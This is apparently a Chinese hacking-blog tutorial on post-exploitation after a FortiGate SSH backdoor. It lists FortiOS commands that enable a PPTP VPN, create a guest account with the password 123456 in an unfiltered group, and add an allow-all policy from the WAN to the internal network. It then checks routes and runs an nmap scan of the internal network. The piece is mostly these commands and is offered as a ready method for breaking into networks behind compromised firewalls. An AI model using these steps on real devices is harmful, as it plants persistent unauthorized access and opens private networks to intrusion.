飞塔SSH后门 进一步利用方法

华盟原创文章投稿奖励计划

      飞塔SSH后门 进一步利用方法

      昨天FortiGate爆了一个SSH Backdoor ,具体内容可以看这(http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-up-to-5-0-7.html)

  这个后门获取到的是防火墙的root权限,就是所有防火墙的操作我们都可以做,这里我们利用防火墙的

  vpn服务来进入到内网中 ,从而进行进一步渗透。

  0X00 先看下用户组

   show user group

      飞塔SSH后门 进一步利用方法  

 

       0x01开启vpn

    config vpn pptp

  set status enable

  set eip 192.168.200.100

  set sip 192.168.200.1

  set usrgrp Guest-group

  end

  config user local

  edit "guest"

  set type password

  set passwd 123456

  next

  end

  config user group

  edit "Guest-group"

  set profile "unfiltered"

  set member "guest"

  next

  end

  config firewall policy

  edit 9

  set srcintf "wan1"

  set dstintf "internal"

  set srcaddr "all"

  set dstaddr "all"

  set action accept

  set schedule "always"

  set service "ANY"

  next

  end

       飞塔SSH后门 进一步利用方法

       0x02 内网进一步渗透

  查看路由表

  

   get router info routing-table all

      飞塔SSH后门 进一步利用方法   

      这里已经成功连接上,并使用nmap扫描,这里记得你是防火墙root,所以你想去哪就去哪(蒙多)

      飞塔SSH后门 进一步利用方法 

 

      飞塔SSH后门 进一步利用方法 

 

      飞塔SSH后门 进一步利用方法 

 

 

 

原文地址:https://hack.77169.com/201601/223680.shtm

本文原创,作者:华盟君,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/18674.html

发表评论